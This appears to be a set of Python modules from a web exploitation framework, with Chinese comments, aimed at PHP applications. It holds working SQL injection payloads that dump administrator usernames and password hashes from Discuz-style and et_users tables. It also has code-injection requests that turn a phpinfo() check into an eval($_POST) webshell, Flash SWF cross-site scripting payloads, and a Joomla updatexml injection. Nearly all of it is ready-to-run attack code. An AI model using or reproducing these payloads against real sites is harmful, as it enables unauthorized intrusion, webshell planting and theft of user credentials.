def exploit(options): url = options['target']['current_value'] url = url + "/index.php/module/aciton/param1/${@phpinfo()}" logger.process("Requesting target site") response = http.get(url) if "<title>phpinfo()</title>" in response.text: logger.success("Exploitable!") logger.success("Phpinfo: %s" % url) url = url.replace("@phpinfo()", "@print(eval($_POST[chu]))") logger.success("Webshell: %s" % url) return url
def exploit(options): logger.process("Requesting target site") # 获取设置的参数 url = options["target"]["current_value"] try: result = verify(url) logger.success("Username: %s" % result[0]) logger.success("password: %s" % result[1]) return "%s: %s|%s" % (url, result[0], result[1]) except: pass
def exploit(options): url = options['target']['current_value'] url = url + "/static/image/common/flvplayer.swf?file=1.flv&" \ "linkfromdisplay=true&link=javascript:alert(1);" logger.process("Requesting target site") response = http.get(url, 5) if hashlib.md5(response.content).hexdigest( ) == "7d675405ff7c94fa899784b7ccae68d3": logger.success("Exploitable!") logger.success(url) return url
def exploit(options): url = options['target']['current_value'] url = url + "/plugins/kindeditor/plugins/multiimage/images/swfupload.swf" \ "?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!ale" \ "rt%281%29;//" logger.process("Requesting target site") response = http.get(url) if hashlib.md5(response.content).hexdigest( ) == "3a1c6cc728dddc258091a601f28a9c12": logger.success("Exploitable!") logger.success(url) return url
def exploit(options): # 设置URL url = options["target"]["current_value"] + payload logger.process("send request...") response = http.get(url) if valiator(response.text) == True: logger.success("exploit success, target site have xss vuln ! :)") return True else: logger.error("exploit fail, target site no xss ! :(") return False
def verify(url): logger.process("Requesting target site") data = { "gids[99]": "'", "gids[100][0]": ") and (select 1 from (select count(*" "),concat(version(),floor(rand(0)*2))" "x from information_schema.tables gro" "up by x)a)#" } response = http.post(url, data) if "MySQL Query Error" in response.text: logger.success("Exploitable!") return True
def verify(url): logger.process("Verify webshell...") url = url + '/data/config.inc.php' # 根据payload设置 payload = 'c=phpinfo()' response = http.post(url, payload) if "phpinfo" in response.text: logger.success("Exploit success :)") return {'shell': url, 'passwd': 'c'} else: logger.error('Exploit fail :(') return False
def exploit(options): url = options['target']['current_value'] logger.process("Requesting " + url) url = url + "/?m=topic&a=topic&keyword=a%27%20and%201=2%20union%20select" \ "%201,2,3,concat(0x68616e64736f6d65636875,user_name,0x7e7e7e," \ "password,0x68616e64736f6d65636875),5%20from%20et_users%23" header = {'Cookie': options['cookie']['current_value']} response = http.get(url, header, 5) if "handsomechu" in response.text: logger.success("Exploitable!") user = response.text.split("handsomechu")[1].split("~~~") username, password = user logger.success("Username: %s" % username) logger.success("Hash: %s" % password) return "%s: %s|%s" % (url, username, password)
def exploit(options): url = options['target']['current_value'] urls = [ url + "/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D", url + "/search.html?keyword=%24%7B%40phpinfo%28%29%7D" ] for i, url in zip(range(1, 3), urls): logger.process("Testing URL %d..." % i) response = http.get(url) if "<title>phpinfo()</title>" in response.text: logger.success("Exploitable!") logger.success("Phpinfo: %s" % url) url = url.replace("%24%7B%40phpinfo%28%29%7D", "%24%7B%40eval(%24_POST%5B'chu'%5D)%7D") logger.success("WebShell: %s" % url) return url
def get_hash(url): logger.process("Getting manager's hash") data = { "gids[99]": "'", "gids[100][0]": ") and (select 1 from (select count(*" "),concat((select (select (select con" "cat(0x7e7e7e,username,0x7e,password," "0x7e7e7e) from cdb_members limit 0,1" ") ) from `information_schema`.tables" " limit 0,1),floor(rand(0)*2))x from " "information_schema.tables group by x" ")a)#" } response = http.post(url, data) result = response.text.split("~~~")[1].split("~") return {"username": result[0], "md5": result[1]}
def exploit(options): url = options['target']['current_value'] logger.process("Requesting " + url) url = url + "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686" \ "16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647" \ "36f6d65636875)%20from%20et_users%20limit%201,1%23" # 设置cookie header = {'Cookie': options['cookie']['current_value']} response = http.get(url, header, 5) if "handsomechu" in response.text: logger.success("Exploitable!") user = response.text.split("handsomechu")[1].split("~~~") username, password = user logger.success("Username: %s" % username) logger.success("Hash: %s" % password) return "%s: %s|%s" % (url, username, password)
def exploit(options): # 日志回显 logger.process("set exploit params...") # 获取设置的参数 url = options["target"]["current_value"] logger.process("send request...") # 设置header headers = {'xxoo':'1111111111111111'} # 请求 response = http.get(url, headers, 1) if "success" in response: logger.success("exploit success ! :)") return True else: logger.error("exploit fail ! :(") return False
def exploit(options): # 日志回显 logger.process("set exploit params...") # 获取设置的参数 url = options["target"]["current_value"] payload = url + 'index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x5e,concat(1,(select md5(1))),1)' logger.process("send request...") # 请求 response = http.get(url) flag = hashlib.md5(1) if flag.hexdigest() in response: logger.success("exploit success ! :)") return True else: logger.error("exploit fail ! :(") return False
def do_exploit(self, line): if not self.current_exploit: return else: logger.process("Exloit init...") return self.run_exploit()